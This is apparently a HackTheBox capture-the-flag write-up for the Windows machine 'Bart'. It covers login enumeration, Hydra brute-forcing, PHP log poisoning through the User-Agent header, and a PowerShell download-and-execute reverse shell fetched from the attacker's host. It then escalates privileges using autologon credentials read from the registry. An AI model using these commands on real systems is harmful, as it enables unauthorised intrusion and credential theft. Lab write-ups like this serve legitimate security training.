HackTheBox — Bart Writeup
Bart is a Medium Level but challenging Windows machine on HackTheBox.Here we use PHP log poisoning to gain initial access and privilege escalate via Autologon Credentials or by using Juicy Potato.Another tricky part of this box was password guessing and bruteforcing.
ENUMERATION
We find port 80 is open and is running IIS server. There is also a domain forum.bart.htb which we will add to our /etc/hosts as shown below.We have also added bart.htb just in case it hosts something.
We open the domain in our browser and get this webpage
In the source code we find a user called harvey potter who is a developer.(Keep this name in mind) its not harry potter
if we run the curl command on the target IP we get a 200 response
But if we add any gibberish directory after the ip we still get a 200 response.
Lets visit it in a webpage
Lets run durb on the ip or bart.htb and we get a directory called /monitor
Lets visit the directory (bart.monitor.htb) and we find this webpage
DONT forget to add the domain monitor.bart.htb in your /etc/hosts
We click on Forgot Password and get this:
Since this login page actually tells us whether a username is correct or not, we can use it to our advantage and possibly guess correct username. When i try harvey, it works! So a user called harvey does exist
We try harvey’s surname Potter as the password and it works. We are in !
Now we go to Servers and we find a new domain internal-01.bart.htb
lets add it to our /etc/hosts
Looks like another login panel.
I try harvey potter again but it fails
PASSWORD BRUTEFORCING USING HYDRA
I tried finding the password using hydra but i was getting lots of false positive passwords.The command which finally worked for me was this:
EXPLANATION OF THE COMMAND
SYNTAX: hydra -l username -P passwordlist <domain> <request-type> “/directory:burp-request:failedMessage”
Do note the directory here is found in the url of the login panel (/simple_chat/login.php) and the burp request part has to be intercepted using burp while trying to login. And finally i have used “Password” at the end of the command as the Failed message contains the word password (The password must be at least 8 characters long). In case of queries feel free to DM me.
We log in using the password and get this chat forum
In the source code we find another url it seems to call a log file
It looks like it logs the username and user agent of the incoming request
LOG POSIONING
Visit the url shown below
and intercept the request using burp and sent it to Repeater.
The user-agent is vulnerable.
In the user-agent of the request, add this piece of php code and forward the request.We get a 200 OK response as you can see on the right side. Great !
Now in the 1st line beside the username, add a &cmd=whoami and again forward the request. As you can see we get a 200 OK response and on the right side you can see we are nt authority user meaning our “whoami” command got executed
To get a reverse shell, we will simply have to replace the whoami command with a powershell reverse shell and i will use Nishang’s Invoke-PowerShellTcp.ps1 script for this. You can find it here-https://github.com/samratashok/nishang
Download Invoke-PowerShellTcp.ps1 and in the last line add this Invoke command as shown below. Replace the ip and port with your kali’s ip
Now host this file using python’s http server also dont forget to start a netcat listener in your port 5555
This will be the final command
powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.2:9999/Invoke-PowerShellTcp.ps1')
After url encoding this is what the command will look like: (see the second line)
Copy the url encoded command and paste it after &cmd= in the burp request.
Forward the request .This will execute the powershell revershell and give us a shell in our netcat listener.
PRIVILEGE ESCALATION
To privilege escalate we can either use Autologon Credentials or Juicy Potato Attack.
JUICY POTATO
Using systeminfo command we see that the build is 15063
Also we also find that SeImpersonatePrivilege is Enabled.Therefore it is vulnerable to juicy potato attack.
I have already covered it many times in my older ctfs.If you wish to try it, you can refer Rana Khalil’s writeup-https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/bart-writeup-w-o-metasploit
AUTOLOGON CREDENTIALS
I ran winpeas on the target and found administrator’s password. Here i will cover 2 ways- PSSESSION and NET USE
This same info can be found by this mannual command as well
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
+PSSESSION
We can become Administrator by spawning a PSSession with the newly found credentials:
$pw = ConvertTo-SecureString -string "3130438f31186fbaf962f407711faddb" -AsPlainText -force;
$pp = new-object -typename System.Management.Automation.PSCredential -ArgumentList "BART\Administrator", $pw;
Enter-PSSession -ComputerName localhost -Credential $pp
From the PSSession we can run commands using this syntax:
Invoke-Command -ScriptBlock { command }
DO NOTE CAREFULLY : This s where i was able to find the user flag
The root flag is located in the Desktop folder of Administrator
NOTE: This same method has also been covered in (HTB-CHATTERBOX) writeup by rana khalil-https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/windows-boxes/chatterbox-writeup-w-o-metasploit#e858 (ALSO REFER)
+NET USE
PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> net use x: \\localhost\c$ /user:administrator 3130438f31186fbaf962f407711faddb
The command completed successfully.
PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> x:
PS X:\> cd users\administrator\desktop
PS X:\users\administrator\desktop> ls
Directory: X:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/02/2018 12:51 32 root.txt
With admin shell, we can grab both flags:
PS C:\Users\Administrator\Documents> cat C:\users\h.potter\desktop\user.txt
625b6c7a...
PS C:\Users\Administrator\Documents> cat C:\users\Administrator\Desktop\root.txt
0074a38e...
It can also be done using Runas.Refer 0xdf’s writeup for that.
I hope you liked my writeup and learned a lot from it.For more such writeups follow me here on Medium. — Zeus